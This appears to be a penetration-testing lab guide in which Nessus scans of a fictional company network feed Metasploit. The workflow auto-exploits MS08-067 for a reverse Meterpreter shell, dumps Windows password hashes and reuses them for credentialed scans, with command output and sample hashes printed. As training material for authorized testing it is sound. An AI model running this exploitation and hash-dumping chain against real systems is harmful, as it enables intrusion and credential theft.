
© 2018 Caendra, Inc. - Hera For PTP - Nessus




You are a member of a penetration testing team and your task is to conduct a vulnerability
assessment against the internal network of FooCompany. This assessment is performed
onsite and you are directly connected to the company's LAN.

Target organization: FooCompany.

Scope: This is what the client organization defined as the scope of the tests:

• Organization network: 192.168.78.0/24


• DMZ: 10.100.0.0/24

The following image summarizes the Lab environment:



• Perform a vulnerability assessment

• Configuring Nessus policies, credentials and plugins


• Using Nessus through Metasploit console

This lab will present you with different tasks in order to fulfill these objectives.

The tasks are meant for educational purposes and to show you the usage of different tools
and different methods to achieve the same goal.

Important: They are not meant to be used as a methodology.

Armed with the skills acquired during these tasks, you can achieve the Lab goal.

Repeat this lab as often as you like, but if this is the first time you do this lab, we advise you
to follow these tasks.

Solutions are provided at the end of this document.

• Nessus
• Metasploit



Start Nessus and run a new scan on the target network 192.168.78.0/24, using the
existing policy Internal Network Scan.

Once the scan is finished, complete the following table with the discovered hosts and the
number of high and medium vulnerabilities found for each.

Host IP High Vulnerabilities Medium Vulnerabilities

Note: you can also perform host discovery using tools like Nmap and then feed Nessus with
the right IP addresses.

Metasploit offers the ability to use Nessus directly from the msfconsole. This is a very
useful feature that allows us to load existing Nessus scans and then exploit existing
vulnerabilities.

Once you have loaded the previous scan (Task 1) into Metasploit, find exploitable
vulnerabilities, or use plugins such as auto_exploit or db_autopwn, in order to obtain
one or more meterpreter shells.

NOTE: this plugin has been removed from recent versions of Metasploit; you'll need to
install it manually.

This hopefully allows us to obtain access to target machines and then retrieve useful
information, such as credentials, to use for further Nessus scans in our penetration testing
cyclical process.



You should now have a meterpreter session. Use it to dump password hashes from the
exploited machine (hashdump command from meterpreter shell). Once you have the
hashes, create a new Nessus scan in order to use NTLM hashes as Windows credentials.

Moreover, set the following SSH credentials:

• Username: netadmin
• Password: netpwd

Once the scan is finished, you will notice that the report differs from the one obtained
previously (Task 1). This happens because Nessus is now able to scan the remote hosts using
credentials, thus running checks with local privileges.

Please fill in the following table with the results of the new scan:

Host IP High Vulnerabilities Medium Vulnerabilities

The organization asks you to perform a Web Application scan against the web server located
inside the DMZ (10.100.0.0/24). The server IP address is 10.100.0.80.

Create a new Nessus policy and perform a Web App scan. Do not use an existing policy;
think about which plugins are useless for this target and which are not.

The first thing to do is to start the Nessus service:

# service nessusd start

or from the Applications menu: Vulnerability Analysis > Nessus start.

Once the service is running, we can access the Nessus GUI, at the address:
https://127.0.0.1:8834

We can now start our scan against the network by starting a new Scan based on the Basic
Network Scan policy.

NOTE: since we are within the target network, if we set the whole subnet
192.168.78.0/24 as the target, our own machine will be scanned too. To avoid this, we can
use tools like Nmap to perform host discovery first, and then manually provide Nessus with
the IP addresses to scan: nmap -sn -oG - 192.168.78.* | awk '/Up$/ {print $2}'



After selecting FooCompany from the Scans menu, we can have an overview of the results:



Note: depending on the plugins update level, scan results might differ.

As you can see from the results, different vulnerabilities have been found on the target
machines. You can navigate them by selecting the host and then the specific vulnerability.
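To fill in the Host / High / Medium table without clicking through every host, the scan can be exported in .nessus format (the same XML that nessus_db_import pulls into Metasploit later) and summarised per host by severity. The following is an added example, not part of the lab: the sample export is constructed and trimmed; plugin names and IDs for 192.168.78.1 are those that appear in the vulns output below, while the severities and the two Windows findings are illustrative.

```python
# Added example (not from the lab): count findings per host and severity in a
# Nessus .nessus (XML v2) export, the data behind the lab's results table.
import xml.etree.ElementTree as ET
from collections import Counter, defaultdict

# ReportItem@severity values used by Nessus.
SEVERITY = {"0": "Info", "1": "Low", "2": "Medium", "3": "High", "4": "Critical"}

# Constructed sample in .nessus v2 layout; severities are illustrative.
SAMPLE_NESSUS = """\
<NessusClientData_v2>
  <Report name="FooCompany">
    <ReportHost name="192.168.78.1">
      <HostProperties><tag name="host-ip">192.168.78.1</tag></HostProperties>
      <ReportItem port="0" protocol="tcp" severity="0" pluginID="19506" pluginName="Nessus Scan Information" pluginFamily="Settings"/>
      <ReportItem port="443" protocol="tcp" severity="3" pluginID="20007" pluginName="SSL Version 2 and 3 Protocol Detection" pluginFamily="Service detection"/>
      <ReportItem port="443" protocol="tcp" severity="2" pluginID="78479" pluginName="SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)" pluginFamily="General">
        <cve>CVE-2014-3566</cve>
      </ReportItem>
    </ReportHost>
    <ReportHost name="192.168.78.10">
      <HostProperties><tag name="host-ip">192.168.78.10</tag></HostProperties>
      <ReportItem port="445" protocol="tcp" severity="4" pluginID="34477" pluginName="MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check)" pluginFamily="Windows">
        <cve>CVE-2008-4250</cve>
      </ReportItem>
      <ReportItem port="445" protocol="tcp" severity="2" pluginID="57608" pluginName="SMB Signing not required" pluginFamily="Misc."/>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def severity_table(nessus_xml):
    """Map host name -> Counter of severity labels, one count per ReportItem."""
    root = ET.fromstring(nessus_xml)
    table = defaultdict(Counter)
    for host in root.iter("ReportHost"):
        name = host.get("name")
        table[name]  # ensure hosts with only Info findings still appear
        for item in host.iter("ReportItem"):
            table[name][SEVERITY.get(item.get("severity"), "Unknown")] += 1
    return dict(table)


def findings_with_cve(nessus_xml, min_severity=2):
    """(host, pluginName, [CVE ids]) for every finding at or above min_severity;
    the CVE list is what gets cross-referenced against patch records."""
    root = ET.fromstring(nessus_xml)
    out = []
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            if int(item.get("severity", "0")) >= min_severity:
                cves = [c.text for c in item.findall("cve")]
                out.append((host.get("name"), item.get("pluginName"), cves))
    return out


def print_table(table):
    """Render the Host IP / High / Medium / Critical table from the task."""
    print(f"{'Host IP':<16}{'High':>6}{'Medium':>8}{'Critical':>10}")
    for host in sorted(table, key=lambda h: tuple(int(o) for o in h.split("."))):
        c = table[host]
        print(f"{host:<16}{c['High']:>6}{c['Medium']:>8}{c['Critical']:>10}")


if __name__ == "__main__":
    print_table(severity_table(SAMPLE_NESSUS))
```

Critical (severity 4) is listed separately because the lab table only asks for High and Medium; folding Critical into High silently changes the numbers you report to the client.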

Instead of using the web browser GUI, we can also use Nessus from Metasploit. This helps
when we want to assess and then exploit the vulnerabilities found. Since we have already
performed the scan, we will just load the Nessus results into msf and automatically exploit
vulnerabilities.

Let’s open a new msfconsole and then let’s connect to Nessus:

msf > load nessus


/usr/share/metasploit-framework/plugins/nessus.rb:47: warning: key
"nessus_scanner_list" is duplicated and overwritten on line 78
[*] Nessus Bridge for Metasploit
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: Nessus
msf > nessus_connect user:password@localhost
[*] Connecting to https://localhost:8834/ as user
[*] User user authenticated successfully.
msf >

Now that we are connected to Nessus, we can run basic commands such as running a new
scan, navigating reports and so on.

msf > nessus_


nessus_admin nessus_report_download nessus_scan_resume
nessus_connect nessus_report_host_details nessus_scan_resume_all
nessus_db_import nessus_report_hosts nessus_scan_stop
nessus_db_scan nessus_report_vulns nessus_scan_stop_all
nessus_family_list nessus_save nessus_scanner_list
nessus_folder_list nessus_scan_details nessus_server_properties
nessus_help nessus_scan_export nessus_server_status
nessus_index nessus_scan_export_status nessus_template_list
nessus_logout nessus_scan_launch nessus_user_add
nessus_plugin_details nessus_scan_list nessus_user_del
nessus_plugin_list nessus_scan_new nessus_user_list
nessus_policy_del nessus_scan_pause nessus_user_passwd
nessus_policy_list nessus_scan_pause_all
msf > nessus_

Since we already have a report, we can load it so that Metasploit can load the list of
vulnerabilities. First of all, let's list the existing scans:



msf > nessus_scan_list
Scan ID Name Owner Started Status Folder
------- ---- ----- ------- ------ ------
8 FooCompany user completed 3

Once we know the scan identifier, we can use the nessus_report_* commands as
follows:

msf > nessus_report_hosts 8

or

msf > nessus_report_vulns 8

and we can import the results in Metasploit:

msf > nessus_db_import 8


[*] Exporting scan ID 8 is Nessus format...
[+] The export file ID for scan ID 8 is 799298863
[*] Checking export status...
[*] The status of scan ID 8 export is ready
[*] Importing scan results to the database...
[*] Importing data of 192.168.78.10
[*] Importing data of 192.168.78.15
[*] Importing data of 192.168.78.18
[*] Importing data of 192.168.78.20
[*] Importing data of 192.168.78.23
[*] Importing data of 192.168.78.1
[+] Done
msf >

Now vulnerabilities and targets have been imported into the database. To explore the list,
we need to invoke vulns:

msf > vulns


[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=Nessus Scan
Information refs=NSS-19506
[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=SSL Session Resume
Supported refs=NSS-51891
[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=SSL Version 2 and 3
Protocol Detection refs=NSS-20007
[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=SSLv3 Padding Oracle
On Downgraded Legacy Encryption Vulnerability (POODLE) refs=CVE-2014-3566,BID-
70574,OSVDB-113251,CERT-577193,NSS-78479
[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=SSL Cipher Block
Chaining Cipher Suites Supported refs=NSS-70544
[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=SSL Perfect Forward
Secrecy Cipher Suites Supported refs=NSS-57041



What we can do now is to automatically exploit the target hosts using the vulnerabilities
loaded into the DB. To do this, we will use the pentest plugin by darkoperator. You can
download it here:

https://github.com/darkoperator/Metasploit-Plugins/blob/master/pentest.rb

and install it as follows:

root@kali:~/.msf4/plugins# wget https://raw.githubusercontent.com/darkoperator/Metasploit-Plugins/master/pentest.rb

msf > load pentest

___ _ _ ___ _ _
| _ \___ _ _| |_ ___ __| |_ | _ \ |_ _ __ _(_)_ _
| _/ -_) ' \ _/ -_|_-< _| | _/ | || / _` | | ' \
|_| \___|_||_\__\___/__/\__| |_| |_|\_,_\__, |_|_||_|
|___/

Version 1.3
Pentest plugin loaded.
by Carlos Perez (carlos_perez[at]darkoperator.com)
[*] Successfully loaded plugin: pentest
msf >

Once the plugin is loaded, we can run the exploitation process:

msf > vuln_exploit


[*] Generating List for Matching...
[*] Matching Exploits (This will take a while depending on number of hosts)...
[+] Matched Exploits:
[+] 192.168.78.10 exploit/windows/smb/ms08_067_netapi 445 500
[*] Running Exploits:
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.78.10

[*] Started reverse TCP handler on 192.168.78.100:16307


msf > [*] 192.168.78.10:445 - Automatically detecting the target...
[*] 192.168.78.10:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.78.10:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.78.10:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.78.10
[*] Meterpreter session 1 opened (192.168.78.100:16307 -> 192.168.78.10:1032) at
2016-05-10 13:11:07 +0200
[*] AutoAddRoute: Routing new subnet 192.168.78.0/255.255.255.0 through session 1



As you can see, the machine 192.168.78.10 has been successfully exploited and we have
obtained a Meterpreter session. Now we should be able to dump password hashes and then
use them to run a new Nessus scan with credentials:

msf > sessions

Active sessions
===============

Id Type Information Connection


-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ELS-WINXP 192.168.78.100:16307 ->
192.168.78.10:1032 (192.168.78.10)

msf > sessions -i 1


[*] Starting interaction with 1...

meterpreter > sysinfo


Computer : ELS-WINXP
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32
meterpreter > hashdump

Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
eLSAdmin:1003:67fb9805a02c8249aad3b435b51404ee:b0c6522c478a0886fb92544d16c75679:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d:::
netadmin:1004:6d4c8d28110c649d1f6252914a7633d7:1f1c7bfdba645b14c37dde4465b59542:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0:::

meterpreter >



The next step is to create and configure a new Nessus policy in order to scan the targets using
the credentials obtained with the previous hashdump command. Remember that each line
printed by hashdump is composed as follows:

• The first field is the username
o e.g.: Administrator
• The second field is the Security Identifier
o e.g.: 500
• The third field is the LM hash
o e.g.: e52cac67419a9a224a3b108f3fa6cb6d
• The fourth field is the NTLM hash
o e.g.: 8846f7eaee8fb117ad06bdd830b7586c
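The field layout above, parsed programmatically, as an added example that is not part of the lab: the script splits each hashdump line into its four fields and derives the two things a credentialed scan or a hardening review should report on, accounts with a blank password and accounts whose LM hash is still stored (the well-known empty-password values for LM and NT are used as the reference). The sample input is the hashdump output shown earlier in this document.

```python
# Added example (not from the lab): parse pwdump-style hashdump lines
# (user:rid:LM:NT:::) and flag blank passwords and stored LM hashes.
import re

# Hash values of an empty password: LM of the zero-padded empty string and
# NT (MD4 of the empty UTF-16LE string). Both are well known.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Taken from the hashdump output earlier in this document.
SAMPLE_HASHDUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
eLSAdmin:1003:67fb9805a02c8249aad3b435b51404ee:b0c6522c478a0886fb92544d16c75679:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d:::
netadmin:1004:6d4c8d28110c649d1f6252914a7633d7:1f1c7bfdba645b14c37dde4465b59542:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8dbc0:::
"""

# username : numeric id : 32 hex LM : 32 hex NT : (rest ignored)
PWDUMP_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):")


def parse_hashdump(text):
    """Return one dict per account with the four fields plus derived flags."""
    accounts = []
    for line in text.splitlines():
        m = PWDUMP_LINE.match(line.strip())
        if not m:
            continue  # prompts, blank lines, wrapped fragments
        user, rid = m.group(1), int(m.group(2))
        lm, nt = m.group(3).lower(), m.group(4).lower()
        accounts.append({
            "user": user,
            "rid": rid,
            "lm": lm,
            "nt": nt,
            # NT hash of the empty string: the account has no password.
            "empty_password": nt == EMPTY_NT,
            # A real LM hash is stored: the password is at most 14 characters
            # and protected by the legacy algorithm as well as by NT.
            "lm_stored": lm != EMPTY_LM,
            # LM hashes each 7-character half separately; an empty second half
            # means the password is 7 characters or fewer.
            "short_password": lm != EMPTY_LM and lm[16:] == EMPTY_LM[16:],
        })
    return accounts


def accounts_with_lm_hash(accounts):
    """Usernames whose LM hash is stored. A non-empty list means the host
    does not enforce 'Do not store LAN Manager hash value' (NoLMHash)."""
    return [a["user"] for a in accounts if a["lm_stored"]]


if __name__ == "__main__":
    parsed = parse_hashdump(SAMPLE_HASHDUMP)
    for acct in parsed:
        flags = [k for k in ("empty_password", "lm_stored", "short_password") if acct[k]]
        print(f"{acct['user']:<18} rid={acct['rid']:<5} {', '.join(flags) or 'ok'}")
    print("LM hashes stored for:", ", ".join(accounts_with_lm_hash(parsed)))
```

The regex anchors on the first four colon-separated fields only, so the trailing `:::` (empty comment and home-directory fields in pwdump format) and any wrapped or partial lines copied from a terminal are skipped instead of producing bad credentials.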

We can now create a new scan policy and add the exported Windows credentials:

Furthermore, we can also add the known SSH credentials:



Let's run the scan:



As you can see, configuring Nessus with the right credentials allows us to scan target hosts
locally and find many more vulnerabilities. In this case the credentials worked for three
hosts.

From the Policies menu, let's create a new policy. Since we want to scan a web
application, from the Scanner Template we can select Web Application Tests.

Then, let's perform a simple Nmap port scan, so that the policy can be restricted to the ports that are actually open:

root@kali:~# nmap -sS 10.100.0.80

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-10 15:20 CEST


Nmap scan report for 10.100.0.80
Host is up (0.14s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
1026/tcp open LSA-or-nterm
3306/tcp open mysql



Now, in Settings > Discovery let's set the Scan Type to Custom. Then, let's disable
the Host Discovery feature and, from the Port Scanning menu, let's enter the open
ports we just discovered.

Note: 135, 139 and 1026 were left out because they are not related to the web application, but
you could add them as well.

From the Assessment section, as Scan Type let's select: Scan for all web
vulnerabilities and Save.

Now that we have completed our policy set-up, we can run the scan against the webserver.
Here's the results:



Now that you are more confident with Nessus, you can try to create custom Nessus policies
in order to check which plugins and which configurations fit best in different situations.
You can also practice scanning and exploiting targets directly from Metasploit.
